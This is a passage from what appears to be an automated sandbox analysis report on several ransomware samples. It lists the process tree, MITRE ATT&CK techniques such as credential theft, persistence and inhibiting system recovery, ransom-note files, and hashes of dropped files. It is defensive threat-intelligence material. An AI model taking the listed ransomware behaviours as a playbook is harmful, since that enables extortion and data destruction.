                  • Suspicious use of SetWindowsHookEx
                  PID:8156
            • C:\Windows\system32\taskmgr.exe
              "C:\Windows\system32\taskmgr.exe" /4
              1⤵
              • Checks SCSI registry key(s)
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:1344
              • C:\Windows\system32\taskmgr.exe
                "C:\Windows\system32\taskmgr.exe" /1
                2⤵
                • Drops startup file
                • Checks SCSI registry key(s)
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: GetForegroundWindowSpam
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                PID:3956
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5016 -ip 5016
              1⤵
                PID:8084
              • C:\Windows\system32\werfault.exe
                werfault.exe /h /shared Global\0c0eb7f1c6274d159d14142884003170 /t 3988 /p 3508
                1⤵
                  PID:5256
                • C:\Windows\system32\vssvc.exe
                  C:\Windows\system32\vssvc.exe
                  1⤵
                    PID:6920
                  • C:\Windows\system32\wbengine.exe
                    "C:\Windows\system32\wbengine.exe"
                    1⤵
                      PID:6516
                    • C:\Windows\System32\vdsldr.exe
                      C:\Windows\System32\vdsldr.exe -Embedding
                      1⤵
                        PID:7444
                      • C:\Windows\System32\vds.exe
                        C:\Windows\System32\vds.exe
                        1⤵
                        • Checks SCSI registry key(s)
                        PID:8044
                      • C:\Windows\system32\werfault.exe
                        werfault.exe /h /shared Global\68dcb19b35bc419aa77d29a2e89b46f4 /t 3988 /p 3508
                        1⤵
                          PID:5232
                        • C:\Windows\SysWOW64\werfault.exe
                          werfault.exe /h /shared Global\1ae9b430f78942068775340e908062a4 /t 8160 /p 8156
                          1⤵
                            PID:6096
                          • C:\Windows\system32\OpenWith.exe
                            C:\Windows\system32\OpenWith.exe -Embedding
                            1⤵
                            • Modifies registry class
                            • Suspicious use of SetWindowsHookEx
                            PID:6272
                          • C:\Windows\system32\OpenWith.exe
                            C:\Windows\system32\OpenWith.exe -Embedding
                            1⤵
                            • Modifies registry class
                            • Suspicious use of SetWindowsHookEx
                            PID:6392
                          • C:\Windows\system32\NOTEPAD.EXE
                            "C:\Windows\system32\NOTEPAD.EXE" C:\SystemID\PersonalID.txt
                            1⤵
                            • Opens file in notepad (likely ransom note)
                            PID:2052

                          Network

                          MITRE ATT&CK Enterprise v15

                          Reconnaissance

                          Resource Development

                          Initial Access

                          Execution

                          Command and Scripting Interpreter

                          1
                          T1059

                          Windows Management Instrumentation

                          1
                          T1047

                          Persistence

                          Boot or Logon Autostart Execution

                          2
                          T1547

                          Registry Run Keys / Startup Folder

                          1
                          T1547.001

                          Winlogon Helper DLL

                          1
                          T1547.004

                          Privilege Escalation

                          Boot or Logon Autostart Execution

                          2
                          T1547

                          Registry Run Keys / Startup Folder

                          1
                          T1547.001

                          Winlogon Helper DLL

                          1
                          T1547.004

                          Defense Evasion

                          Direct Volume Access

                          1
                          T1006

                          File and Directory Permissions Modification

                          1
                          T1222

                          Indicator Removal

                          3
                          T1070

                          File Deletion

                          3
                          T1070.004

                          Modify Registry

                          3
                          T1112

                          Credential Access

                          Credentials from Password Stores

                          1
                          T1555

                          Credentials from Web Browsers

                          1
                          T1555.003

                          Unsecured Credentials

                          5
                          T1552

                          Credentials In Files

                          4
                          T1552.001

                          Credentials in Registry

                          1
                          T1552.002

                          Discovery

                          Peripheral Device Discovery

                          2
                          T1120

                          Query Registry

                          4
                          T1012

                          System Information Discovery

                          4
                          T1082

                          System Location Discovery

                          1
                          T1614

                          System Language Discovery

                          1
                          T1614.001

                          Lateral Movement

                          Collection

                          Data from Local System

                          4
                          T1005

                          Email Collection

                          1
                          T1114

                          Command and Control

                          Proxy

                          1
                          T1090

                          Exfiltration

                          Impact

                          Defacement

                          1
                          T1491

                          Inhibit System Recovery

                          4
                          T1490

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Program Files\7-Zip\7-zip.chm.exe
                            Filesize

                            1.8MB

                            MD5

                            275af12209cd2c28381a8a3d8ce99f5b

                            SHA1

                            a47160c198d69f54e953993821f7a4edd80b8133

                            SHA256

                            0352c6e9fa28240acf7333b4f738b7da4554587bbc7cd6778bf84b75258aeddf

                            SHA512

                            d50019ace490481b38b99b2dc8d19c932b4e6c196ec2c8fd872f13eb8cd7f57193f5cb46a43ba28e55c0eefaaa9fae999fcdf3cbe97837d6de16f4e4f5899052

                            Download Submit

                          • C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\ReadMe.txt
                            Filesize

                            2KB

                            MD5

                            d0fb4838a9b950e6311e0fd7d18c138c

                            SHA1

                            1f96f64bd12434d6216040a20d6631f9d9d35c7b

                            SHA256

                            87de37c3692d3b960ab8f73c7ecd12d7894cb2042ba5741ffbcf8e769f284d63

                            SHA512

                            d853cba6e1dcab9a36f61f1f495128c6e739637d6ec478fe4d0d2d8ab7fb8601131ffcd30538b5943ce3ef932e574394b3c899c6ecff7a19f97d1c27d0eee488

                            Download Submit

                          • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx
                            Filesize

                            64KB

                            MD5

                            d2fb266b97caff2086bf0fa74eddb6b2

                            SHA1

                            2f0061ce9c51b5b4fbab76b37fc6a540be7f805d

                            SHA256

                            b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a

                            SHA512

                            c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

                            Download Submit

                          • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
                            Filesize

                            4B

                            MD5

                            f49655f856acb8884cc0ace29216f511

                            SHA1

                            cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

                            SHA256

                            7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

                            SHA512

                            599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

                            Download Submit

                          • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val
                            Filesize

                            944B

                            MD5

                            6bd369f7c74a28194c991ed1404da30f

                            SHA1

                            0f8e3f8ab822c9374409fe399b6bfe5d68cbd643

                            SHA256

                            878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d

                            SHA512

                            8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                            Filesize

                            53KB

                            MD5

                            a26df49623eff12a70a93f649776dab7

                            SHA1

                            efb53bd0df3ac34bd119adf8788127ad57e53803

                            SHA256

                            4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

                            SHA512

                            e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\MSVCP140.dll
                            Filesize

                            439KB

                            MD5

                            5ff1fca37c466d6723ec67be93b51442

                            SHA1

                            34cc4e158092083b13d67d6d2bc9e57b798a303b

                            SHA256

                            5136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062

                            SHA512

                            4802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\PIL\_imaging.cp39-win32.pyd
                            Filesize

                            2.5MB

                            MD5

                            78d94f3724c28ebb7c393342b5355f2e

                            SHA1

                            6e57576b09cf2688e804f684c8d10b55cff52bf9

                            SHA256

                            cf72bcff475a8855a0b3d10535fa6a4049fcb650e8f6e839f6ad614dce570c6a

                            SHA512

                            0c221fb0136fba654ccb65463fe0b526e33c5a386c0ce6202c922a745c285490a7164a861186a9e0c3c0b3a21654ce79cb21a8c3716489758feb6b0122e27f43

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\VCRUNTIME140.dll
                            Filesize

                            81KB

                            MD5

                            55c8e69dab59e56951d31350d7a94011

                            SHA1

                            b6af2d245ae4d67c38eb1cd31e0c1cffb29b9b2c

                            SHA256

                            9d8d21022ff9d3f6b81a45209662a4f3481edc2befae0c73b83cf942eab8be25

                            SHA512

                            efb2ac1891724df16268480628eb230b6ee37ed47b56d2e02a260559865cdd48ee340ce445e58f625e0f4d6dbdc5bfb7ce2eeedf564b837cff255ef7d1dc58cd

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\_bz2.pyd
                            Filesize

                            75KB

                            MD5

                            387725bc6de235719ae355dfaa81e67c

                            SHA1

                            428b74b0bf8acd04eb20dc5a016352042c812c7a

                            SHA256

                            a9de8848c95518434cb5c2a9cb9d648cba140021e49f2e5212becf13a329b5d0

                            SHA512

                            bed2d6902f2ddd7dc7c2043c210ce682df75616ca63d163b756559dc7d33e926733f96d5407dc856061fba711ce41de9b01bb7b9db3940fa359c32c40d9f8233

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\_ctypes.pyd
                            Filesize

                            112KB

                            MD5

                            aff88d04f5d45e739902084fce6da88a

                            SHA1

                            6ce6a89611069deaa7c74fa4fa86882dc21b5801

                            SHA256

                            34371eb9b24ba67ce6803d965cf5f0fe88ef4762af648ec2183e5bf21835d876

                            SHA512

                            8dd8f90ae1cc0fbc76f0039bc12e1aee7b2718017f4f9b09361001bed7b278b84f20d0fffceda4d5edd8744140cfdf1ca52497645d0480f5d42934f7df9808ba

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\_hashlib.pyd
                            Filesize

                            50KB

                            MD5

                            fdfa235f58a04d19e1ce923ca0d8ae19

                            SHA1

                            4a1178ba7e9a56f8c68dc3391a169222c67237e9

                            SHA256

                            7ad484e99ea33e4eea2cbf09203fb9dbd0c2c325b96e6cf2ffd146156c93bf7a

                            SHA512

                            0fe187e1019c159c0ee90fbc8eea20e40a28ff05223321d04784e577b60a2c0a3a476fabc71bd81dd08e7a127bb6cb03edf5d604bfdda38516fb2c90148dd118

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\_lzma.pyd
                            Filesize

                            157KB

                            MD5

                            f6b74ac19fb0601a4e612a8dc0c916e3

                            SHA1

                            d4a77386caf7f70e66d5ec4543c8d9de0e4bc39f

                            SHA256

                            ce2ea2c96afd8c0cf97fc55130f835b6625a0772d86b259ea82bbc0b3def75e6

                            SHA512

                            0b60c51f76eb6872000d92bbec7fdabf687f5096fd12f1456cf26ad6033c22b998aee94842fda800288bef94790608204f97a7ed034544a1377cbf9722c6a826

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\_socket.pyd
                            Filesize

                            68KB

                            MD5

                            a9450642d8832893998bd213d98d509b

                            SHA1

                            3ef416ffaa438a2809cdffddd1b2717461ead7d4

                            SHA256

                            5407750d69d74318ec66bd1464558c07c06c6aa9edbc0641cd2dd7533378772b

                            SHA512

                            93027a694800d2d92ba773e8232ee016946ee9b36ba211537619df0508e9f50660b9a292d29dd4e90c2406b29bd3b1f8e4eb2226945b7163b2bd3227d4482323

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\_tkinter.pyd
                            Filesize

                            58KB

                            MD5

                            a475634789bb1284d75e55870462a74a

                            SHA1

                            af7bfe3ffeef7479549831c5cd0de487151a6c5f

                            SHA256

                            725a13950969db01ad20af1f36eb28d6011a2feb31bd8c112b6bed2d025bc761

                            SHA512

                            9ca2f331d9ca22732ab0cf12a42d1b221f5daf01b5a83c43a4ba0b48798289d52428ab17cdedfde9eb2daf5f12304fe28e2c4d2306399b7fa562acdc74487a19

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\base_library.zip
                            Filesize

                            758KB

                            MD5

                            67d863a39e90cd2fa3c20f4b06ce8397

                            SHA1

                            98a2e831f22a29d72850d1e7a3de863892dadf5f

                            SHA256

                            02cb3daf59557ea5b992663a29eee8e9ac3241f55d3f34a3fc829be19a381b1b

                            SHA512

                            ac0536c7138325ff311fb6b7dcaaea0629c3535666b42097232a80046bbc8790b0d84e1b4164f7a4f675e47cd5fd4a28d0053714f44a3452297f05f30109fd3d

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\libcrypto-1_1.dll
                            Filesize

                            2.1MB

                            MD5

                            aad424a6a0ae6d6e7d4c50a1d96a17fc

                            SHA1

                            4336017ae32a48315afe1b10ff14d6159c7923bc

                            SHA256

                            3a2dba6098e77e36a9d20c647349a478cb0149020f909665d209f548dfa71377

                            SHA512

                            aa4b74b7971cb774e4ae847a226cae9d125fadc7cde4f997b7564dff4d71b590dcbc06a7103451b72b2afe3517ab46d3be099c3620c3d591ccbd1839f0e8f94a

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\libffi-7.dll
                            Filesize

                            28KB

                            MD5

                            bc20614744ebf4c2b8acd28d1fe54174

                            SHA1

                            665c0acc404e13a69800fae94efd69a41bdda901

                            SHA256

                            0c7ec6de19c246a23756b8550e6178ac2394b1093e96d0f43789124149486f57

                            SHA512

                            0c473e7070c72d85ae098d208b8d128b50574abebba874dda2a7408aea2aabc6c4b9018801416670af91548c471b7dd5a709a7b17e3358b053c37433665d3f6b

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\pyexpat.pyd
                            Filesize

                            164KB

                            MD5

                            3e43bcc2897f193512990e9e9024111b

                            SHA1

                            11dec8c9a1c4b45de9c980125eaef462038c1f2a

                            SHA256

                            0d8ac2a2b81176a06b0fb8663702428d2cdd5bedeab68b04210bf5cb6b49a475

                            SHA512

                            e629f23a9ad1274b57a47b170e598e47f28984dc2aaf4985ded9b217f4288222190eabe5a9fd4b11fa3eadb42040d8a532090544bf46be288b7310966d126aac

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\python39.dll
                            Filesize

                            4.2MB

                            MD5

                            2a9c5db70c6906571f2ca3a07521baa2

                            SHA1

                            765fa27bbee6a02b20b14b2b78c92a880e6627e5

                            SHA256

                            c69ce89b0487d86a63b64951207781f8051282afde67b20d3b8374c1a067f611

                            SHA512

                            fa4a677eaae2d258ac4f083a4e7009d985523b964ada93f53dc399a88c14970c7be2d2f39a7b38a922b58d134df2ede954554dcd00a4895e4273161867acac53

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\select.pyd
                            Filesize

                            23KB

                            MD5

                            1559cf3605d62c03d6ff2440ea3e175f

                            SHA1

                            26faec2bafd8523d1705021d06c56947b58cda1c

                            SHA256

                            b8da64fa424e5fb2bc8de93d2c0dcb55076cd9345452d3c624b3fcbbbe15644b

                            SHA512

                            1891a356ae98a09a7476697b6e7dd0de6b940043910a9aa414e17a523118d76dd0c55ea786d9bd2a77d792bdf95a75b272352eb813d928c429a707a78c09f05c

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\tcl86t.dll
                            Filesize

                            1.3MB

                            MD5

                            30195aa599dd12ac2567de0815ade5e6

                            SHA1

                            aa2597d43c64554156ae7cdb362c284ec19668a7

                            SHA256

                            e79443e9413ba9a4442ca7db8ee91a920e61ac2fb55be10a6ab9a9c81f646dbb

                            SHA512

                            2373b31d15b39ba950c5dea4505c3eaa2952363d3a9bd7ae84e5ea38245320be8f862dba9e9ad32f6b5a1436b353b3fb07e684b7695724a01b30f5ac7ba56e99

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\_MEI18202\tk86t.dll
                            Filesize

                            1.1MB

                            MD5

                            6cadec733f5be72697d7112860a0905b

                            SHA1

                            6a6beeef3b1bb7c85c63f4a3410e673fce73f50d

                            SHA256

                            19f70dc79994e46d3e1ef6be352f5933866de5736d761faa8839204136916b3f

                            SHA512

                            e6b3e52968c79d4bd700652c1f2ebd0366b492fcda4e05fc8b198791d1169b20f89b85ec69cefa7e099d06a78bf77ff9c3274905667f0c94071f47bafad46d79

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sf1qyg12.vpd.ps1
                            Filesize

                            60B

                            MD5

                            d17fe0a3f47be24a6453e9ef58c94641

                            SHA1

                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                            SHA256

                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                            SHA512

                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
                            Filesize

                            50KB

                            MD5

                            a4e326edfb5c14337c348ea156e08cef

                            SHA1

                            8d798dda9fc662a5904003946c7d926c7ea7c221

                            SHA256

                            8c2cc065a557828ba632feaa1e6165b1a7e434291d4a48ebb513dbc7b27b8f20

                            SHA512

                            837431acbb9891a0bb2d6b7500c2404929a6c7a7218b42fde4762e50fc41b8dbe50028e4b857ac2812a3ed87f8141427358445c919c7d82c1e053bbb85d3884e

                            Download Submit

                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Background Tasks Profiles\fb9jlpni.MozillaBackgroundTask-308046B0AF4A39CB-defaultagent\ReadMe.txt.CRYPTEDPAY
                            Filesize

                            3KB

                            MD5

                            9bbad889e2383a2fd803c557dd8eb378

                            SHA1

                            0dac20cbfbe806a3edf6129ab740ca660db4ff12

                            SHA256

                            b71fb6ed4dcf0a48ea3e4775eee2beedd1ec90762b5d5fd71f554d65af79c2fa

                            SHA512

                            5136dd0c2f7185af9a38d6af92df5ab1bbb5e72dee0dbff777168472b111f66a60d2393a9637792b3c241f9273217a32815455855bc2e6c80824e6b199ec0e81

                            Download Submit

                          • C:\Users\Admin\Contacts\ReadMe.txt
                            Filesize

                            3KB

                            MD5

                            20ed6ca26678eeb6a845c175c149951b

                            SHA1

                            296e7b147eac56c966903df1e6e76a4351870130

                            SHA256

                            7c67ce4e7bc83101d62adc2a6a445e805548873c613e1fa75e387b0249233fcd

                            SHA512

                            0715fdc9293d16c8b8449e93eca7391491b3d8eca3e285fb87b0e15439529db9da42952f3dbc0e0aa2c04af084b6d3dc9ca1faa4cc186a811eea1aaa0f5d10c3

                            Download Submit

                          • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Agent.gen-1ba5ab55b7212ba92a9402677e30e45f12d98a98f78cdcf5864a67d6c264d053.exe
                            Filesize

                            610KB

                            MD5

                            deb8f4311fd52319f6168c10b626c808

                            SHA1

                            f4807d71a1048d05815a09b74997f338e26ba9ff

                            SHA256

                            1ba5ab55b7212ba92a9402677e30e45f12d98a98f78cdcf5864a67d6c264d053

                            SHA512

                            ecb2c2630b03a07f20e993722ef9f55f5369d11afa21bec3dab59f65867849fb3596e4d3707730d2d75acd5d62e98afb1c06f2e7a80cd4f5946b51867bed9685

                            Download Submit

                          • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Agent.gen-b103fc649787eb1f6121df8174d0f16aaac736fb53f5f078d312871189285956.exe
                            Filesize

                            61KB

                            MD5

                            9eb958c38bd3d39c55b009f9a200f42f

                            SHA1

                            b5ab794dd5821d08f7ecd860ba7975a6644dd46d

                            SHA256

                            b103fc649787eb1f6121df8174d0f16aaac736fb53f5f078d312871189285956

                            SHA512

                            f7146fa64c8fe89eb4afb29af0b85e1693a03aeb38ae2948b8c047b4f1dd84817954563b6bd5ead4c4461242e1275c47ef4b41cf33fe9e3899dfe3952bc46954

                            Download Submit

                          • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-a2b24057a5bb69f39216c44bc0400a670790c88d6a6016462e4d07db43722bb8.exe
                            Filesize

                            69KB

                            MD5

                            1e175bf4ba4793a382da7167ddbf074f

                            SHA1

                            c461df9cfc14dc79d0e9485f1fe44fd6253e091a

                            SHA256

                            a2b24057a5bb69f39216c44bc0400a670790c88d6a6016462e4d07db43722bb8

                            SHA512

                            cb468afb985d31506e03cd90d05378dbfbe466651db2e0407918eaccaca19c61294dc68f08d17e9c8cf63d7cd05e1fb6b1fad580a17e2c2899a32174dffec0ed

                            Download Submit

                          • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-a3a1dcd338b4e5078dd0a853fa0b84de141d680ea984cd3d914ebc23fc72756d.exe
                            Filesize

                            183KB

                            MD5

                            e21b3b2da765eac6dd83d89682877b49

                            SHA1

                            3fb51724f9e5b9ef940a9354f83a391e354a1ea6

                            SHA256

                            a3a1dcd338b4e5078dd0a853fa0b84de141d680ea984cd3d914ebc23fc72756d

                            SHA512

                            d88ebefa0cf537ea6ad975e008c5a336699ef484f2b6d44fece02a2c25d98e5bb59d260f2064f67b4e25d256e2b1fe46ed7b73353bb02c67a345e1495f4738e6

                            Download Submit

                          • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-a75a498d8ec7bf58a12c07fac6ad98c5581a422cca03fa3ca87b01677f37247e.exe
                            Filesize

                            589KB

                            MD5

                            5d6d98d0ed873da0eaa560212c32dfd8

                            SHA1

                            e0f055ea9c663d202915b54540d09a4e0daf82a2

                            SHA256

                            a75a498d8ec7bf58a12c07fac6ad98c5581a422cca03fa3ca87b01677f37247e

                            SHA512

                            0b31e99eba600067682fab42e07ef8c836f8ef521acfbe1032f184701c2791a4bb0a94364ce962efd7732fa089142383d11788b82a4f006e43590115a3925cbc

                            Download Submit

                          • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-c2c202bf857e481c10ea66181f394b5c890f3d7e5ba13126d7ea5b8d11f3220f.exe
                            Filesize

                            55KB

                            MD5

                            cd22822f28e387ba075f39c23fb024ab

                            SHA1

                            ddb7169a61706d69486dc19fc33f4a217eabc505

                            SHA256

                            c2c202bf857e481c10ea66181f394b5c890f3d7e5ba13126d7ea5b8d11f3220f

                            SHA512

                            45f6c2d5585f0b6f64f0f7d874f92d70dac2d724932f8c60827ebe5d7a831ac0e3a9d48edf700ac8ca27697f9c4b222ac27ce49ab17f694cad702d7fed4e772e

                            Download Submit

                          • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-d3635e7428a16515d98ec564145b363802dfa54418ac6221a638651732af4e2b.exe
                            Filesize

                            1.7MB

                            MD5

                            3b17aa91d84b96c1712f3106e958db03

                            SHA1

                            7c0d1d97a36fa8604878f98bb55cffc9707171de

                            SHA256

                            d3635e7428a16515d98ec564145b363802dfa54418ac6221a638651732af4e2b

                            SHA512

                            c3c4b8666024005d29be76cef967257632e18aa7cd4fa57ab3170de0ccfbe5978cb687f728e5ecef7392694f182ab430610defb4eaf2d88ef059856232367c96

                            Download Submit

                          • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-f4a7d3a3e578388ce1bc0302711d7082e7bc9aa4e0299db7b047f6e93d0fa003.exe
                            Filesize

                            802KB

                            MD5

                            fb55b405501121708ec66dec20a83953

                            SHA1

                            6d4fbfbaf6ff14d83f835c31a7ea2708cf760e14

                            SHA256

                            f4a7d3a3e578388ce1bc0302711d7082e7bc9aa4e0299db7b047f6e93d0fa003

                            SHA512

                            9fdb97a2558246f7f3760f4168db913fd0acc352193f7263d75d31ac422647b24059794b1956fe21d397f477380b686620b3d4411958939fa715b291a02c8bb1

                            Download Submit

                          • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Gen.gen-ebd09856f75a766a48ff636787d345c64bf61d374c69f8f299643b83a02f7123.exe
                            Filesize

                            12.9MB

                            MD5

                            a4877a3227291745c13b74e05597c355

                            SHA1

                            2091f687ee2dd53113542a4b9438a3dc1b26cd84

                            SHA256

                            ebd09856f75a766a48ff636787d345c64bf61d374c69f8f299643b83a02f7123

                            SHA512

                            af76ea99fa88b4c5bee500808c2803cd282c1d4fc9e5d0164163652aa4f80e3f6b8e654febfd835cdcbbbf7cfc7d7bdd02095f72072740c3820cd140da9be466

                            Download Submit

                          • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Python.Agent.gen-d38fd7b985618045a015257f76b115ad1c751ad9d8003d9c41af6f9fa8d7c918.exe
                            Filesize

                            21.0MB

                            MD5

                            078265af9fd10064a23cac405a144677

                            SHA1

                            a94acc3a65654dc9583c927b357ce096bf207606

                            SHA256

                            d38fd7b985618045a015257f76b115ad1c751ad9d8003d9c41af6f9fa8d7c918

                            SHA512

                            a177e3ef3c126b41dddede3e9dc0e6df748215447a018d97bacdb0191e7a46149bb6d7f9fc49a088588fe77be0637130502497f8cf64abd45ef0d13015bdb147

                            Download Submit

                          • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Blocker.gen-57f67d542cc71d54e87a4416a65945b1315def54b9a0077d2f6049fefb9bdf05.exe
                            Filesize

                            181KB

                            MD5

                            652ba7e19b0874c59384c1f3c8f803f8

                            SHA1

                            7fe145ce24ae06d5508b438026c21b9e23669e18

                            SHA256

                            57f67d542cc71d54e87a4416a65945b1315def54b9a0077d2f6049fefb9bdf05

                            SHA512

                            e505abf45a25bef294683d0434be51459133957c558591606bd6319937be2e10c14d99878fecd3d977b5e865a838ef101eb57f26d227d63d3bd60c6de4f4b691

                            Download Submit

                          • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Blocker.pef-a59ca7e47a756d325818eb3b6ae1e423ffe1847131d7be1795a81522f7c64d3f.exe
                            Filesize

                            50KB

                            MD5

                            027df9ea670fd833df0622169548f40b

                            SHA1

                            d715ba18df48c1bbab957cc9e01c8e30306977ec

                            SHA256

                            a59ca7e47a756d325818eb3b6ae1e423ffe1847131d7be1795a81522f7c64d3f

                            SHA512

                            60b0154a21c619c0fccb3b52b227d03f550569315c173723c0ad81e3ab24bb4800814473ae7f26cf02a5a7c5b89ffed668585ee527cf9030e038898c7ef9f373

                            Download Submit

                          • C:\Users\Admin\Favorites\Links\ReadMe.txt.CRYPTEDPAY
                            Filesize

                            3KB

                            MD5

                            374bb836b330cf038a7828870beaa732

                            SHA1

                            67be8aeb44074f4b6fb561114176c4660e118a57

                            SHA256

                            8921a2459cccd6e1e9bb6728c6f2a69cae4ba1919da63ca29499f18321c03df5

                            SHA512

                            7be572e2b0d850d816dbecb5f74c638ac304852c0b66f02bbfaf1c038c19714b035a18188a33a83286e655684450417476feaf0ab70024f34d7533e87b20d09c

                            Download Submit

                          • C:\Users\Admin\Pictures\README.txt
                            Filesize

                            386B

                            MD5

                            dc4f14b4841f142d9fb5c2920186f536

                            SHA1

                            5c151f82e0f99c7d11e41e001adb916d2adb2c0f

                            SHA256

                            17692594613b8217a63430bee1a234559903bbd8d7e798d46d34980c74a9fd2a

                            SHA512

                            f9fd38e009eec846a5860817c8bea25ab8effb63bf9960718a6995158442b11186a6594fccaf2a0c198f81535dc637babd502315562a03a6186c21d65fd03c80

                            Download Submit

                          • C:\Users\Admin\Pictures\Recovery.bmp
                            Filesize

                            1.8MB

                            MD5

                            db23b38264589a1fdddc763f96f9e77c

                            SHA1

                            1f66752e25ccf1db795046716d1b828476f86077

                            SHA256

                            48f6c46e9c929e1c44607abcaacdff26093cb5822d52a114800865c96ae58a52

                            SHA512

                            47d0ddf354d0e0edb7b752490ae90ece24c7a29ef0c2322756a8737bb063364594566dd04b66513b00db3ac5a4cb0c8bebcfc453ff941550aeb3d543414a4763

                            Download Submit

                          • C:\Users\Default\Saved Games\GET_YOUR_FILES_BACK.txt
                            Filesize

                            1KB

                            MD5

                            c416bf3911487d819c45a4001a77b35f

                            SHA1

                            dc19ce5f2f104f710edf83f7efa617f0bc749f67

                            SHA256

                            76bbf445e90dffd6d609e98faad6f84f7dc99c5412026cfb1a6e224b1cb2e6e2

                            SHA512

                            b6ace2a4c58ec68a60b1e1640e5adc1abbc58c669bc0d24f1cc5e1a778d595b5c255c4cc0314f7b3e4a413759658c6c281dafaa59e1110d05119b17d00555e5d

                            Download Submit

                          • F:\ReadMe.txt.CRYPTEDPAY
                            Filesize

                            3KB

                            MD5

                            a85082baa1d8adeae9d9743da58b3000

                            SHA1

                            2ef0e4b1b3f114af57e88cdc8fba35837784433d

                            SHA256

                            742a72bddf5f4772d9615338b20459046f8746d3391912de037110d6eb13ed8e

                            SHA512

                            49488755f6223bb0a11c20e31b4318021aec213847b7ee916f8e334d37d51af4475732a8b51f53cd6624d92b095c669529de0948cef7ec26f8361b2f0b9210bb

                            Download Submit

                          • memory/672-1964-0x0000000005860000-0x0000000005888000-memory.dmp

                            Filesize

                            160KB

                            Download

                          • memory/672-230-0x0000000000970000-0x0000000000B30000-memory.dmp

                            Filesize

                            1.8MB

                            Download

                          • memory/740-214-0x0000000000080000-0x0000000000092000-memory.dmp

                            Filesize

                            72KB

                            Download

                          • memory/1152-210-0x00000000004F0000-0x0000000000506000-memory.dmp

                            Filesize

                            88KB

                            Download

